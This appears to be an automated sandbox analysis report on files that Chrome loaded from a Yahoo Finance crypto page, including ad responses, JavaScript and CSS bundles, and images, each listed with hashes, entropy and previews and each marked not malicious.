                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=1039632299103059&correlator=4380263306446687&eid=44809527%2C31085776&output=ldjh&gdfp_req=1&vrg=202410030101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cscreen%2Cdt%2Cus_yfin_screen_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=728x90&ifi=5&sfv=1-0-40&fsfs=1&fsbs=1&rcs=3&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1728414977530&adxs=276&adys=24&biw=1280&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&vis=1&psz=1280x907&msz=1280x138&fws=0&ohw=0&td=1&egid=22304&topics=1&tps=1&htps=10&a3p=Eh0KDmxpdmVpbnRlbnQuY29tGNOduOymMkgAUgIIbw..&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1728414837073&idt=39349&prev_scp=loc%3Dtop_center%26ri%3D4%26ay_floor_s%3Dfloors%2520set%26hb_pb100%3Dfalse%26hb_adid%3D617f39d70d59a02%26hb_source%3Dclient%26hb_size%3D728x90%26hb_pb%3D0.38%26hb_format%3Dbanner%26hb_bidder%3Dmedianet%26hb_adomain%3Drelated.nativeinfoline.com%26ay_floor%3D0.38%26ay_floor_m%3Dm_0.2%26hb_pb100_openx%3Dfalse%26hb_adomain_openx%3Dciti.com%26hb_format_openx%3Dbanner%26hb_source_openx%3Dclient%26hb_deal_openx%3DOX-XPT-YNe6IG%26hb_size_openx%3D728x90%26hb_pb_openx%3D0.13%26hb_adid_openx%3D63c65365bbf0af3%26hb_bidder_openx%3Dopenx&cust_params=ay_floor_g%3Doptimize%26ay_floor_m%3Dm_0.2%26ay_floor_s%3Dmodel%2520not%2520loaded%26abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Cypf-bankrate-widget-control-v2-q4%252Cyf-portfoliodetail-control%252Cyf-smartasset-msg-a%252Cypf-new-article-template-release-exp-v2%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dcrypto%26pct%3Dscreener%26pg_name%3Dall%26pt%3Dutility%26spaceid%3D1183331958%26bka%3D0%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=4039402601&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=b10de46350aa60e7:T=1728414980:RT=1728414980:S=ALNI_MbOR5d84OxItKD42iWx3bKcLmTJ3Q",1762110980,"/","yahoo.com",1],["UID=00000f31c55563ec:T=1728414980:RT=1728414980:S=ALNI_MYiljBjev6dKSiIqgs2zy_zJFONPg",1762110980,"/","yahoo.com",2]],[138467550613],[6634125984],[5462617191],[3473808467],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGskmNZL93pBcEyesZ-w5OGQqrllpqZz57pmYraZ5fCXTFKfh2z3pcC9Y890GRPpcgcOsv5fjuC5STWK2Ysl8mC2Db_uzidMKPuSkkb6H9m2zm-Gf","CObZsMe__4gDFeeLgwcdYfgGLQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=5df92d437b15c513:T=1728414980:RT=1728414980:S=AA-AfjbtCoyXKkqVRYZXDxSbz4wB",1743966980,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.166603250500697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcH/efag2CiY9uvAZIAdSbFtn:H69mc4sl3O4/eigVh9SSA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7990D75ADD2B01D123E447DEA3E95F09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4B4C04F956F1184548E19F4E45C7402D3210BCDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F6926955506914E94357E156171119DB9EFE5A01EC960C1E9F0874C6382A09CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:657020567B7BBCD74C169DB26CF619219F03EBBDF6F508FBFD6B5DAA0136BCDB3A8DEC7A39A9E281B6B998FE2848F278911E3EAF649314C4CA42458002E776F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 6 8.59 7.41 13.17 12l-4.58 4.59L10 18l6-6z"/></svg>';export{s as R};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2691
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.705386975705373
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:U7esar5d9uhqBtkXNi2lN8+yKM4mMGhSvmvy5vxTxBs:aesMg0kL8+dGMjmv6Ts
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2EDF1EF8B333C40979976D1A49BC234C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D75AC12795B4A9575C874E1B190712CD62A87AFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:50A1901684F223BF26594DD3415B1E50F184820A16DAA810CC5452911E9117A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F697A1FA0786316FC01003F72621920932E2657E4ACF5A471E35D02717C42C9DB5A12DF311895A776A563DCAE9B8FC0B6721833529A054B9DBFFF4C52FC564D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL.............u.........................................................................U................................................................g......................................U......................................................................................................................................................................................................1.................................]....!.....G....f.......g..../....8..-.....}................a....................+.....$.....o...........9..W........x..<.....j..........l...........r..>.....Z..@........X.. ........4..............c..........*....R.....H....A.._...............J..i....................'.............M.....T..y..#............7......uMe...\tRNS.........................(.)-b.m....w...A....^.].............k...ka`.......xx.??...*.(........IDATX.W.TSW..!.I. .Pp.D.....Y..ms..{..N .+a....u..X..Z......].....<.\.s..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 79 x 38, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.022997040570905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPl6Zt/1IV/xl/k4E08up:6v/lhPqKl7Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1805D995B50A2F2C26201E8290CBF705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:76B7B793A5353A24E46372B8C8E899F1829ED148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7CF7D05023F0700848C65665F70BD76BA87BDA35838B2FA6CF4FFFAE8F91F21B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:633345136FC250B0A6733FBC47F2E37585ED90C6505D7B0BAE97C79B46F531F1CB73A69E7280C506348519DE2EC897A857E5AA5C879EF8DAD509B18BF73EA908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...O...&.......QC....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (27317)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.307761574608542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:HnYmkx25/P3kPuUI3opz3iaT+CsSoR8K7YO422k4mQIZilH4ygD1CxmGHDl75t9s:Hvw3i8aoT/tmB1Lb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:680B6C6089EFA1AC9ABD2CCF8CF113BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6F79B73494FE2848C89D930A75113E12612D723D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E31AF348E449AC83D2BCC2FC978B089F334D3B9924D5A068631DFC2E8E7FD368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1A54E694BC756AB2D3D3954CE88728DCF6244BD17BE007610E5670AF31C55351FB2CAE09F96CA07CF59373A90DA854D020F99ACB55A61B28C0BBD840CE843530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/43.CtYdpA_T.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{n as M,aa as ht,v as pt,s as gt,a0 as mt,a6 as yt,I as _t}from"./scheduler.Dr9AAxFe.js";import{H as oe,S as ve,R as He}from"./control.CYgJF_JY.js";new URL("sveltekit-internal://");function wt(e,n){return e==="/"||n==="ignore"?e:n==="never"?e.endsWith("/")?e.slice(0,-1):e:n==="always"&&!e.endsWith("/")?e+"/":e}function bt(e){return e.split("%25").map(decodeURI).join("%25")}function vt(e){for(const n in e)e[n]=decodeURIComponent(e[n]);return e}function ge({href:e}){return e.split("#")[0]}const At=["href","pathname","search","toString","toJSON"];function St(e,n,t){const r=new URL(e);Object.defineProperty(r,"searchParams",{value:new Proxy(r.searchParams,{get(a,o){if(o==="get"||o==="getAll"||o==="has")return s=>(t(s),a[o](s));n();const i=Reflect.get(a,o);return typeof i=="function"?i.bind(a):i}}),enumerable:!0,configurable:!0});for(const a of At)Object.defineProperty(r,a,{get(){return n(),e[a]},enumerable:!0,configurable:!0});return r}const kt="/__data.json",Et=".html__data.json";fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (4241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2664268183067335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:BmpnyiT+3LHVCkABb2L73JAr8XTPzZFatL6fj9mq5Wp:BmpyiT+71Lm2pxXDzZA65mx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7409B1E4F1C331EEA2D20E239AD2AFE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A4EB8DA9AECB68715DCCD1774B247C08E4799E5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7C38AF355ADD4D678EDB3C9A171A4302F351D68F3FECD790760D583FEF0C79E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3EE63CE538153EDF85A4C36E004EEB2ED01FC77962BE45DFE3C4C91543B8D0F528C37841EA7939B98D596EEBC5C4EF91C0C03108E7C79491271836B5B871057C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{r as v}from"./commonUtil.CI22_Irn.js";import"./43.CtYdpA_T.js";const T=({label:e,request:r=null,response:t=null,context:s,time:o})=>{typeof window<"u"||(s.parent&&typeof s.request>"u"?s.parent().then(({stores:n,session:a})=>{const{isDebug:i=!1}=a;i&&(console.log(JSON.stringify({duration:o[1]-o[0],label:e,request:r,response:t,time:o})),n.debug.addPerf({label:e,request:r,response:t,time:o}))}):(s.locals||(s.locals={}),s.locals.perf||(s.locals.perf=[]),s.locals.perf.push({label:e,request:r,response:t,time:o})))};function q(e,r){console.error("Logger Error:",e,r)}function P(e,r){if(e.name==="AbortError"){const t=new Error("Request timed out",{cause:e});throw q({message:"Request timed out",status:408},r),t}throw q(e,r),e}function U(e,{includeResponse:r=!1}={}){if(!e.ok){const t=new Error(e.statusText);throw t.status=e.status,t}return e.text().then(t=>{let s=t;try{s=JSON.parse(t)}catch{}return r?[s,e]:s})}function $(e){return(r,t)=>{const s=typeof e=="function"?e:fetch,o=(t==null?void
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9395450763758575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:GSeNMRA5cGFFSKPjHtLFSKP2YOAfASPAFKseBCIMSb56rVfYTsxSzXKWMRrMT9:GdOccGbRjTRHOiA+sZNNYGSXNMRYT9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D156B541C028FE7D3167B101D15500F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4CFD74A00BE521BF8179D56B3AD6348DDABB2876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AA02D2FD7FA18DFBB59B4E27C0D8CA3B0EA1A1DB2EB4677FC13758A6DB9CEEB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0F5FEC8B53FB278A1C23C67296FC132E0F2107ABBC06CD27D9247E293527904772F5D6A0DBD5F0A43990B99385EA5C43781E3A2E1F2F66BB09C9139085A62EFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Ov\(h\){overflow:hidden}#atomic .Pt\(2px\){padding-top:2px}#atomic .Pos\(r\){position:relative}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (35505), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):35505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.227715216344498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:sYUZ40ObVKNBjaaIWYxpQ6ZM5CW4E9wdWA2nJlQr9qo764GRrKtJ:D0ObVKNBjaaIWApQ6i5CGwdWA2nJlQrr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4636CB14C3D8D1EBA5BB4DA2CFCF18AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:68615EE696008A4B9ADB0E7BC7A2A4DD4FA4F41F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A02F925DF2E7879D16ACE7355007AA590813CE71082466242C75F668AF18A668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7B81E4FBF1033AB76444319DBF120198075A10655CE4C763EB2A54AF0E24F52B572DF34E05C59D3C01BB6AA9236F5FB981261565B79AF9178FEB5ED60D522252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-scrollview-2.23.3-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-scrollview"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(s){if(i[s])return i[s].exports;var r=i[s]={i:s,l:!1,exports:{}};return e[s].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,s){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:s})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function s(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4966)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.988168098137488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:Zpu34nU+s+SkEF0+QZJI3JBhffpZfeZO3w:ZpvtSFVOkxxZ9g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:77015880DF88C7E5C4430E1DDD7B32E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:307DC1B3D6CC07B74559AF6E19EBD2E51403F007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F738FD8060AEAA4FE6DA42BF1E4C5921864ECFA71D06B3E6C8B7F62E9C090D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:05A5EADAB1B142817E0CBB4FB1B318A174FF4FA943789F33EEB3594BA5A23B6563A0A13AF48B53537EC63076B677BDC5005C2FF4962C0490A809956E2E3757F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Ticker.Cs267Y2O.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.ticker.yf-138ga19.yf-138ga19{--padding-y:var(--_padding-y, var(--space-1));--padding-x:var(--_padding-x, var(--space-2));--padding-left-logo:var(--space-1);--min-height:1.25rem;--logo-size:.75rem;--font-size:var(--ticker-name-font-size, var(--font-s));align-items:center;border-radius:var(--border-radius-xl);display:inline-flex;font-size:var(--font-size);font-weight:var(--font-medium);gap:var(--space-1);line-height:1.25;min-height:var(--ticker-min-height, var(--min-height));padding:var(--padding-y) var(--padding-x);text-align:center;width:-moz-fit-content;width:fit-content;max-width:100%}.ticker.ga.yf-138ga19.yf-138ga19{grid-area:ticker}.ticker.logo.yf-138ga19.yf-138ga19{padding-left:var(--padding-left-logo)}.ticker.stacked.yf-138ga19.yf-138ga19{border-radius:var(--border-radius-m);gap:.375rem;flex-direction:row}.ticker.stacked.yf-138ga19:hover .symbol.yf-138ga19,.ticker.stacked.yf-138ga19:focus .symbol.yf-138ga19{color:var(--hover-focus-color, var(--hovered-emph-same));-webkit-text-de
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ade.googlesyndication.com/ddm/activity/dc_oe=ChMI8ee4mr__iAMV0KqDBx1jmwc-EAAYACDqw_VbQhMIoqSQmL__iAMVWoeDBx0tvgLI;dc_eps=AHas8cDNTafoggHSyQg3Ru7exsF0rapUZG5wNAqicxFSNYHvvpaFhBWH9qlid_D8sUAHw9ICQd1WtU18YHhIjLgIIbU;met=1;&timestamp=1728414901554;eid1=871060;ecn1=1;etm1=0;eid2=2;ecn2=1;etm2=10;eid3=7227556;ecn3=1;etm3=5;eid4=6064763;ecn4=3;etm4=0;eid5=6064769;ecn5=1;etm5=0;eid6=6064760;ecn6=1;etm6=0;eid7=6064754;ecn7=1;etm7=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://sb.scorecardresearch.com/p2?c1=2&c2=7241469&c5=1183331958&c7=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&c8=Crypto%20Currencies%3A%20prices%2C%20changes%2C%20trading%20volume%20%26%20daily%20charts%20-%20Yahoo%20Finance&c9=&c14=-1&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=5p2n7hO8PmpLEqqSFXrOlP4sHP7NgFgXSSqIJMACbic%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1728414866040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.346918014246048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7Ew8kNoADe2G+On/n1AN4p13x5uxJQnKsw4NrHIZI2MXb6:DEje28F13x5uzQnTEIu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E0C6D8D653D75D99B4FD272F8A1BBE04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:69D62C468EBD33702D34C43623C8685ADB776BE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C4701179C17827A7D417DBC7D9A40CDD6FBB0112D29E90B822BBF5B2A33D63AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5EDA8C6A8C8AFC5B508D276F32736004364530FA6662EAA0C3D86E020A4E334B91813FC2799CBB126242A6B0D65F3D78CE5F066D1E06D36BC09B6319A8C98D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/sadbundle/3895761895101862695/Q3FY25_AURA_AWARENESS_COMPETITIVE_GEMINI_728x90/replay.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............NF.....IDAT8....+EQ.......G.G.D$.R.R2...yf...S..+e...!.5..hi.Zmw...&....o...J.a.G.@3P.d.w....W...G..^........:..4...D%...w.:.....p..$..:.* .2qNS..P.q.mxr..n........p%...o..O;...>...@....uWk......R4..m........j.=o.Y..s.@I...._..H...U^.[..s.>.`}B`#.e+n4)G..........E`P...Pz.@o.;u......@....v..('.fpF.q........2......'..;.70....d..]j..v.^.oz...&".U.X^.H..6.8..[.~.u.Ju,...(.H.k]j../."....Z.1k<S....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.976550133551652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
